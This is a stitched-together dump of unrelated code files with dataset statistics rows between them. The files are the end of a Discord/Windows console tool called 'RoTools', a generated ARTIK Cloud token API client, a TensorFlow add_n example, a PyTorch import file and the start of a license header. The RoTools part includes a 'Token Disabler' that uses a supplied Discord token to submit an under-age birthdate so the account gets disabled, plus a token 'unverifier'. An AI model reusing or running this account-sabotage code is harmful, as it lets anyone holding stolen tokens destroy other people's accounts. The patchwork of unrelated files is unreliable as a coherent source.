    print(F"{Fore.CYAN}║{Fore.WHITE} {Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE} 1 | Bravery {Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE} 2 | Brilliance {Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE} 3 | Balance {Fore.CYAN}║")
    print(F"{Fore.CYAN}╚═════════════════════════════════════════════════════════╝")#-------------------|
    try:
        ChangeHypesquadHouseHouse = int(input(f"\n{Fore.CYAN}[INPUT] {Fore.WHITE}Option: "))
        ChangeHypesquadHouseToken = input(f'{Fore.CYAN}[INPUT] {Fore.WHITE}Token: ')
        headers = {'Authorization': ChangeHypesquadHouseToken, 'Content-Type': 'application/json'}
        r = requests.get('https://discord.com/api/v8/users/@me', headers=headers)
        if r.status_code == 200:
            # Token validated: switch to the browser-like headers for the POST.
            headers = {
                'Authorization': ChangeHypesquadHouseToken,
                'Content-Type': 'application/json',
                'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) discord/0.0.305 Chrome/69.0.3497.128 Electron/4.0.8 Safari/537.36'
            }
        # BUG FIX: the choice is an int but was compared against the strings
        # "1"/"2"/"3", so ``payload`` was never assigned and every run died
        # with a NameError that the bare except reported as "Invalid token".
        # house_id: 1 = Bravery, 2 = Brilliance, 3 = Balance.
        if ChangeHypesquadHouseHouse in (1, 2, 3):
            payload = {'house_id': ChangeHypesquadHouseHouse}
        else:
            raise ValueError('invalid house option')
        r = requests.post('https://discordapp.com/api/v6/hypesquad/online', headers=headers, json=payload, timeout=10)
        if r.status_code == 204:
            print(f'\n{Fore.CYAN}[INFO] {Fore.WHITE}House changed')
        input(f"\n{Fore.WHITE}Press [Enter] to return to Discord Menu")
        DiscordMenu()
    except Exception:
        # Narrowed from a bare ``except:`` (no longer eats KeyboardInterrupt).
        print(f"\n{Fore.RED}[ERROR] {Fore.WHITE}Invalid token")
        input(f"\n{Fore.WHITE}Press [Enter] to return to Discord Menu")
        DiscordMenu()
#Discord Menu 2 > Disable Token
def DisableToken():
    """Validate a token, then trigger account disablement via an invalid birthdate PATCH."""
    os.system('title RoTools 0.1 - Discord Token Disabler')  # Windows-only console title
    os.system('cls')  # Windows-only clear screen
    print(F"{Fore.CYAN}╔═════════════════════════════════════════════════════════╗")#-------------------|
    print(F"{Fore.CYAN}║{Fore.WHITE}██████╗ █████╗ ████████╗ █████╗ █████╗ ██╗ ██████╗{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██╔══██╗╚══██╔══╝██╔══██╗██╔══██╗██║ ██╔════╝{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██████╔╝██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚█████╗ {Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚═══██╗{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██║ ██║╚█████╔╝ ██║ ╚█████╔╝╚█████╔╝███████╗██████╔╝{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}╚═╝ ╚═╝ ╚════╝ ╚═╝ ╚════╝ ╚════╝ ╚══════╝╚═════╝ {Fore.CYAN}║")
    print(F"{Fore.CYAN}╠═════════════════════════════════════════════════════════╣")#-------------------|
    print(F"{Fore.CYAN}║{Fore.WHITE} Discord Token Disabler {Fore.CYAN}║")
    print(F"{Fore.CYAN}╚═════════════════════════════════════════════════════════╝")#-------------------|
    disabletokentoken = input(f'\n{Fore.CYAN}[INPUT] {Fore.WHITE}Token: ')
    headers = {'Authorization': disabletokentoken, 'Content-Type': 'application/json'}
    # First verify the token by fetching the account profile.
    r = requests.get('https://discord.com/api/v8/users/@me', headers=headers)
    if r.status_code == 200:
        # Submit an under-age date of birth; the code treats the resulting
        # 400 response as the account having been disabled — verify this
        # still holds against the current Discord API.
        r = requests.patch('https://discordapp.com/api/v8/users/@me', headers={'Authorization': disabletokentoken}, json={'date_of_birth': '2015-7-16'})
        if r.status_code == 400:
            print(f'\n{Fore.CYAN}[INFO] {Fore.WHITE}Token disabled')
            input(f"\n{Fore.WHITE}Press [Enter] to return to Discord Menu 2")
            DiscordMenu2()
        else:
            print(f"\n{Fore.RED}[ERROR] {Fore.WHITE}Invalid token")
            input(f"\n{Fore.WHITE}Press [Enter] to return to Discord Menu 2")
            DiscordMenu2()
    else:
        # Profile fetch failed: the token itself is bad.
        print(f"\n{Fore.RED}[ERROR] {Fore.WHITE}Invalid token")
        input(f"\n{Fore.WHITE}Press [Enter] to return to Discord Menu 2")
        DiscordMenu2()
#Discord Menu 2 > Token Unverifier
def TokenUnverifier():
    """Discord Token Unverifier screen.

    Validates the entered token, then POSTs a relationship request whose
    204 response is treated as "unverified". Always returns to Discord
    Menu 2 afterwards.
    """
    os.system('title RoTools 0.1 - Discord Token Unverifier')
    os.system('cls')
    print(F"{Fore.CYAN}╔═════════════════════════════════════════════════════════╗")#-------------------|
    print(F"{Fore.CYAN}║{Fore.WHITE}██████╗ █████╗ ████████╗ █████╗ █████╗ ██╗ ██████╗{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██╔══██╗╚══██╔══╝██╔══██╗██╔══██╗██║ ██╔════╝{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██████╔╝██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚█████╗ {Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚═══██╗{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██║ ██║╚█████╔╝ ██║ ╚█████╔╝╚█████╔╝███████╗██████╔╝{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}╚═╝ ╚═╝ ╚════╝ ╚═╝ ╚════╝ ╚════╝ ╚══════╝╚═════╝ {Fore.CYAN}║")
    print(F"{Fore.CYAN}╠═════════════════════════════════════════════════════════╣")#-------------------|
    print(F"{Fore.CYAN}║{Fore.WHITE} Discord Token Unverifier {Fore.CYAN}║")
    print(F"{Fore.CYAN}╚═════════════════════════════════════════════════════════╝")#-------------------|
    token = input(f'\n{Fore.CYAN}[INPUT] {Fore.WHITE}Token: ')
    check = requests.get('https://discord.com/api/v8/users/@me',
                         headers={'Authorization': token, 'Content-Type': 'application/json'})
    if check.status_code != 200:
        message = f"\n{Fore.RED}[ERROR] {Fore.WHITE}Invalid token"
    else:
        r = requests.post('https://discordapp.com/api/v8/users/@me/relationships',
                          headers={'Authorization': token, 'User-Agent': 'discordbot'},
                          json={'username': 'LMAO', 'discriminator': 6572})
        if r.status_code == 204:
            message = f'\n{Fore.CYAN}[INFO] {Fore.WHITE}Token unverified'
        else:
            message = f"\n{Fore.RED}[ERROR] {Fore.WHITE}Token unverifier failed"
    print(message)
    input(f"\n{Fore.WHITE}Press [Enter] to return to Discord Menu 2")
    DiscordMenu2()
#Windows Menu
def WindowsMenu():
    """Windows tools menu: dispatches to the power menu or back to main.

    Fix: non-numeric input used to crash with an unhandled ValueError
    from int(); it is now treated like any other incorrect option.
    """
    os.system('title RoTools 0.1 - Windows Menu')
    os.system('cls')
    print(F"{Fore.CYAN}╔═════════════════════════════════════════════════════════╗")#-------------------|
    print(F"{Fore.CYAN}║{Fore.WHITE}██████╗ █████╗ ████████╗ █████╗ █████╗ ██╗ ██████╗{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██╔══██╗╚══██╔══╝██╔══██╗██╔══██╗██║ ██╔════╝{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██████╔╝██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚█████╗ {Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚═══██╗{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██║ ██║╚█████╔╝ ██║ ╚█████╔╝╚█████╔╝███████╗██████╔╝{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}╚═╝ ╚═╝ ╚════╝ ╚═╝ ╚════╝ ╚════╝ ╚══════╝╚═════╝ {Fore.CYAN}║")
    print(F"{Fore.CYAN}╠═════════════════════════════════════════════════════════╣")#-------------------|
    print(F"{Fore.CYAN}║{Fore.WHITE} Windows Menu {Fore.CYAN}║")
    print(F"{Fore.CYAN}║ ║")#-------------------|
    print(F"{Fore.CYAN}║{Fore.WHITE} 1 | Windows Power Menu {Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE} 0 | Main Menu {Fore.CYAN}║")
    print(F"{Fore.CYAN}╚═════════════════════════════════════════════════════════╝")#-------------------|
    try:
        WindowsMenuChoice = int(input(f"\n{Fore.CYAN}[INPUT] {Fore.WHITE}Option: "))
    except ValueError:
        # Sentinel that matches no menu entry -> falls into the error branch.
        WindowsMenuChoice = -1
    if WindowsMenuChoice == 1:
        WindowsPower()
    elif WindowsMenuChoice == 0:
        MainMenu()
    else:
        print(f"\n{Fore.RED}[ERROR] {Fore.WHITE}Incorrect option")
        input(f'\n{Fore.WHITE}Press [Enter] to return to Windows Menu')
        WindowsMenu()
#Windows Menu > Windows Power Menu
def WindowsPower():
    """Windows power menu: logout / hibernate / shutdown / restart.

    Fix: non-numeric input used to crash with an unhandled ValueError
    from int(); it is now treated like any other incorrect option.
    """
    os.system('title RoTools 0.1 - Windows Power Menu')
    os.system('cls')
    print(F"{Fore.CYAN}╔═════════════════════════════════════════════════════════╗")#-------------------|
    print(F"{Fore.CYAN}║{Fore.WHITE}██████╗ █████╗ ████████╗ █████╗ █████╗ ██╗ ██████╗{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██╔══██╗╚══██╔══╝██╔══██╗██╔══██╗██║ ██╔════╝{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██████╔╝██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚█████╗ {Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚═══██╗{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██║ ██║╚█████╔╝ ██║ ╚█████╔╝╚█████╔╝███████╗██████╔╝{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}╚═╝ ╚═╝ ╚════╝ ╚═╝ ╚════╝ ╚════╝ ╚══════╝╚═════╝ {Fore.CYAN}║")
    print(F"{Fore.CYAN}╠═════════════════════════════════════════════════════════╣")#-------------------|
    print(F"{Fore.CYAN}║{Fore.WHITE} Windows Power Menu {Fore.CYAN}║")
    print(F"{Fore.CYAN}║ ║")#-------------------|
    print(F"{Fore.CYAN}║{Fore.WHITE} 1 | Log out {Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE} 2 | Hibernate {Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE} 3 | Shutdown {Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE} 4 | Restart {Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE} 0 | Windows Menu {Fore.CYAN}║")
    print(F"{Fore.CYAN}╚═════════════════════════════════════════════════════════╝")#-------------------|
    try:
        WindowsPowerChoice = int(input(f"\n{Fore.CYAN}[INPUT] {Fore.WHITE}Option: "))
    except ValueError:
        # Sentinel that matches no menu entry -> falls into the error branch.
        WindowsPowerChoice = -1
    if WindowsPowerChoice == 1:
        os.system('shutdown /l')
    elif WindowsPowerChoice == 2:
        os.system('shutdown /h')
    elif WindowsPowerChoice == 3:
        os.system("shutdown /s")
    elif WindowsPowerChoice == 4:
        os.system("shutdown /r")
    elif WindowsPowerChoice == 0:
        WindowsMenu()
    else:
        print(f"\n{Fore.RED}[ERROR] {Fore.WHITE}Incorrect option")
        input(f'\n{Fore.WHITE}Press [Enter] to return to Windows Power Menu')
        WindowsPower()
#Main Menu
def MainMenu():
    """Top-level menu: credits / Windows tools / Discord tools / exit.

    Fixes: (1) non-numeric input used to crash with ValueError from
    int(); (2) the exit path ran os.system('exit'), which only spawns a
    child shell that immediately exits — it never ended this program.
    Returning does (the script terminates when MainMenu unwinds).
    """
    os.system('title RoTools 0.1 - Main Menu')
    os.system('cls')
    print(F"{Fore.CYAN}╔═════════════════════════════════════════════════════════╗")#-------------------|
    print(F"{Fore.CYAN}║{Fore.WHITE}██████╗ █████╗ ████████╗ █████╗ █████╗ ██╗ ██████╗{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██╔══██╗╚══██╔══╝██╔══██╗██╔══██╗██║ ██╔════╝{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██████╔╝██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚█████╗ {Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚═══██╗{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}██║ ██║╚█████╔╝ ██║ ╚█████╔╝╚█████╔╝███████╗██████╔╝{Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE}╚═╝ ╚═╝ ╚════╝ ╚═╝ ╚════╝ ╚════╝ ╚══════╝╚═════╝ {Fore.CYAN}║")
    print(F"{Fore.CYAN}╠═════════════════════════════════════════════════════════╣")#-------------------|
    print(F"{Fore.CYAN}║{Fore.WHITE} Main Menu {Fore.CYAN}║")
    print(F"{Fore.CYAN}║ ║")#-------------------|
    print(F"{Fore.CYAN}║{Fore.WHITE} 1 | Credits {Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE} 2 | Windows Menu {Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE} 3 | Discord Menu {Fore.CYAN}║")
    print(F"{Fore.CYAN}║{Fore.WHITE} 0 | Exit {Fore.CYAN}║")
    print(F"{Fore.CYAN}╚═════════════════════════════════════════════════════════╝")#-------------------|
    try:
        MainMenuChoice = int(input(f"\n{Fore.CYAN}[INPUT] {Fore.WHITE}Option: "))
    except ValueError:
        # Sentinel that matches no menu entry -> falls into the error branch.
        MainMenuChoice = -1
    if MainMenuChoice == 1:
        Credits()
    elif MainMenuChoice == 2:
        WindowsMenu()
    elif MainMenuChoice == 3:
        DiscordMenu()
    elif MainMenuChoice == 0:
        return
    else:
        print(f"\n{Fore.RED}[ERROR] {Fore.WHITE}Incorrect option")
        input(f'\n{Fore.WHITE}Press [Enter] to return to Main Menu')
        MainMenu()
MainMenu()
| 63.227124
| 210
| 0.417005
| 4,521
| 38,695
| 5.205043
| 0.060164
| 0.142444
| 0.127741
| 0.133265
| 0.864397
| 0.857768
| 0.852031
| 0.825812
| 0.781149
| 0.756757
| 0
| 0.008411
| 0.238041
| 38,695
| 612
| 211
| 63.227124
| 0.537987
| 0.038739
| 0
| 0.571154
| 0
| 0.017308
| 0.688239
| 0.262489
| 0
| 0
| 0
| 0
| 0
| 1
| 0.030769
| false
| 0.021154
| 0.003846
| 0
| 0.034615
| 0.501923
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
af0879907e6731874b7a61f5ed98f72faa28358a
| 14,121
|
py
|
Python
|
artikcloud/apis/tokens_api.py
|
artikcloud/artikcloud-python-dev
|
683cd8304f031913bcd581d1eb78ee0efbc5c113
|
[
"Apache-2.0"
] | null | null | null |
artikcloud/apis/tokens_api.py
|
artikcloud/artikcloud-python-dev
|
683cd8304f031913bcd581d1eb78ee0efbc5c113
|
[
"Apache-2.0"
] | null | null | null |
artikcloud/apis/tokens_api.py
|
artikcloud/artikcloud-python-dev
|
683cd8304f031913bcd581d1eb78ee0efbc5c113
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
ARTIK Cloud API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: 2.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class TokensApi(object):
    """Swagger-generated client for ARTIK Cloud token endpoints.

    NOTE: auto-generated by the swagger code generator program; do not
    edit manually. Ref: https://github.com/swagger-api/swagger-codegen
    """

    def __init__(self, api_client=None):
        # The shared Configuration is always instantiated (it may carry
        # global state); the fallback client lives on it so every api
        # object without an explicit client reuses the same instance.
        config = Configuration()
        if not api_client:
            if not config.api_client:
                config.api_client = ApiClient()
            api_client = config.api_client
        self.api_client = api_client
def check_token(self, token_info, **kwargs):
"""
Check Token
(Deprecated) Check Token. See tokenInfo
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.check_token(token_info, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param TokenRequest token_info: Token object to be checked (required)
:return: CheckTokenResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.check_token_with_http_info(token_info, **kwargs)
else:
(data) = self.check_token_with_http_info(token_info, **kwargs)
return data
def check_token_with_http_info(self, token_info, **kwargs):
"""
Check Token
(Deprecated) Check Token. See tokenInfo
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.check_token_with_http_info(token_info, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param TokenRequest token_info: Token object to be checked (required)
:return: CheckTokenResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['token_info']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method check_token" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'token_info' is set
if ('token_info' not in params) or (params['token_info'] is None):
raise ValueError("Missing the required parameter `token_info` when calling `check_token`")
resource_path = '/accounts/checkToken'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'token_info' in params:
body_params = params['token_info']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = ['artikcloud_oauth']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CheckTokenResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def refresh_token(self, grant_type, refresh_token, **kwargs):
"""
Refresh Token
Refresh Token
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.refresh_token(grant_type, refresh_token, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str grant_type: Grant Type. (required)
:param str refresh_token: Refresh Token. (required)
:return: RefreshTokenResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.refresh_token_with_http_info(grant_type, refresh_token, **kwargs)
else:
(data) = self.refresh_token_with_http_info(grant_type, refresh_token, **kwargs)
return data
def refresh_token_with_http_info(self, grant_type, refresh_token, **kwargs):
"""
Refresh Token
Refresh Token
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.refresh_token_with_http_info(grant_type, refresh_token, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str grant_type: Grant Type. (required)
:param str refresh_token: Refresh Token. (required)
:return: RefreshTokenResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['grant_type', 'refresh_token']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method refresh_token" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'grant_type' is set
if ('grant_type' not in params) or (params['grant_type'] is None):
raise ValueError("Missing the required parameter `grant_type` when calling `refresh_token`")
# verify the required parameter 'refresh_token' is set
if ('refresh_token' not in params) or (params['refresh_token'] is None):
raise ValueError("Missing the required parameter `refresh_token` when calling `refresh_token`")
resource_path = '/accounts/token'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
if 'grant_type' in params:
form_params.append(('grant_type', params['grant_type']))
if 'refresh_token' in params:
form_params.append(('refresh_token', params['refresh_token']))
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/x-www-form-urlencoded'])
# Authentication setting
auth_settings = ['artikcloud_oauth']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='RefreshTokenResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def token_info(self, **kwargs):
"""
Token Info
Returns the Token Information
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.token_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: TokenInfoSuccessResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.token_info_with_http_info(**kwargs)
else:
(data) = self.token_info_with_http_info(**kwargs)
return data
def token_info_with_http_info(self, **kwargs):
"""
Token Info
Returns the Token Information
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.token_info_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: TokenInfoSuccessResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = []
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method token_info" % key
)
params[key] = val
del params['kwargs']
resource_path = '/accounts/tokenInfo'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = ['artikcloud_oauth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TokenInfoSuccessResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
| 38.687671
| 108
| 0.577367
| 1,459
| 14,121
| 5.379027
| 0.139822
| 0.047401
| 0.019878
| 0.027523
| 0.813201
| 0.769113
| 0.769113
| 0.741845
| 0.723496
| 0.712029
| 0
| 0.001079
| 0.343885
| 14,121
| 364
| 109
| 38.793956
| 0.845979
| 0.357694
| 0
| 0.656442
| 1
| 0
| 0.156495
| 0.03125
| 0
| 0
| 0
| 0
| 0
| 1
| 0.042945
| false
| 0
| 0.042945
| 0
| 0.147239
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
afc61d40adf140be0256fb0016bc5687bc1ad8e4
| 157
|
py
|
Python
|
torch/ao/sparsity/__init__.py
|
ZackPashkin/pytorch
|
5b1f5c8f17ec4067dc9f9df98bbcc6757ab24444
|
[
"Intel"
] | 2
|
2021-06-24T00:47:33.000Z
|
2021-06-24T00:50:14.000Z
|
torch/ao/sparsity/__init__.py
|
Hior247/pytorch
|
5a2f41a2dbe575ff7ff7066fe642fd53006f0f36
|
[
"Intel"
] | null | null | null |
torch/ao/sparsity/__init__.py
|
Hior247/pytorch
|
5a2f41a2dbe575ff7ff7066fe642fd53006f0f36
|
[
"Intel"
] | null | null | null |
# Parametrizations
from .experimental.pruner.parametrization import PruningParametrization
# Pruner
from .experimental.pruner.base_pruner import BasePruner
| 26.166667
| 71
| 0.866242
| 15
| 157
| 9
| 0.6
| 0.237037
| 0.325926
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.082803
| 157
| 5
| 72
| 31.4
| 0.9375
| 0.146497
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
afd068d0d593d963369fcd640e6b76c40d9d7bc0
| 306
|
py
|
Python
|
res/TensorFlowPythonExamples/examples/add_n/__init__.py
|
juitem/ONE
|
8c6a4b7738074573b6ac5c82dcf1f6697520d1ed
|
[
"Apache-2.0"
] | 255
|
2020-05-22T07:45:29.000Z
|
2022-03-29T23:58:22.000Z
|
res/TensorFlowPythonExamples/examples/add_n/__init__.py
|
juitem/ONE
|
8c6a4b7738074573b6ac5c82dcf1f6697520d1ed
|
[
"Apache-2.0"
] | 5,102
|
2020-05-22T07:48:33.000Z
|
2022-03-31T23:43:39.000Z
|
res/TensorFlowPythonExamples/examples/add_n/__init__.py
|
juitem/ONE
|
8c6a4b7738074573b6ac5c82dcf1f6697520d1ed
|
[
"Apache-2.0"
] | 120
|
2020-05-22T07:51:08.000Z
|
2022-02-16T19:08:05.000Z
|
import tensorflow as tf
# Three 4x4 float32 TF1-compat placeholders; all share the name "Hole",
# which the example exporter uses to mark graph inputs.
in1_ = tf.compat.v1.placeholder(dtype=tf.float32, shape=(4, 4), name="Hole")
in2_ = tf.compat.v1.placeholder(dtype=tf.float32, shape=(4, 4), name="Hole")
in3_ = tf.compat.v1.placeholder(dtype=tf.float32, shape=(4, 4), name="Hole")
# Element-wise sum of the three inputs — the AddN op under test.
# NOTE(review): the module-level names (in1_..in3_, op_) appear to be the
# harness contract — do not rename; confirm against the example runner.
op_ = tf.compat.v1.math.add_n([in1_, in2_, in3_])
| 43.714286
| 76
| 0.705882
| 53
| 306
| 3.924528
| 0.377358
| 0.153846
| 0.192308
| 0.302885
| 0.721154
| 0.721154
| 0.721154
| 0.721154
| 0.721154
| 0.721154
| 0
| 0.079137
| 0.091503
| 306
| 6
| 77
| 51
| 0.669065
| 0
| 0
| 0
| 0
| 0
| 0.039216
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.2
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
bb936443c8fb9cb3d86b99a9dda754107fc241ac
| 7,997
|
py
|
Python
|
api/test/api/responders_test/resource/test_inventory.py
|
korenlev/calipso-cvim
|
39278a5cf09c40b26a8a143ccc0c8d437961abc2
|
[
"Apache-2.0"
] | null | null | null |
api/test/api/responders_test/resource/test_inventory.py
|
korenlev/calipso-cvim
|
39278a5cf09c40b26a8a143ccc0c8d437961abc2
|
[
"Apache-2.0"
] | null | null | null |
api/test/api/responders_test/resource/test_inventory.py
|
korenlev/calipso-cvim
|
39278a5cf09c40b26a8a143ccc0c8d437961abc2
|
[
"Apache-2.0"
] | null | null | null |
###############################################################################
# Copyright (c) 2017-2020 Koren Lev (Cisco Systems), #
# Yaron Yogev (Cisco Systems), Ilia Abashin (Cisco Systems) and others #
# #
# All rights reserved. This program and the accompanying materials #
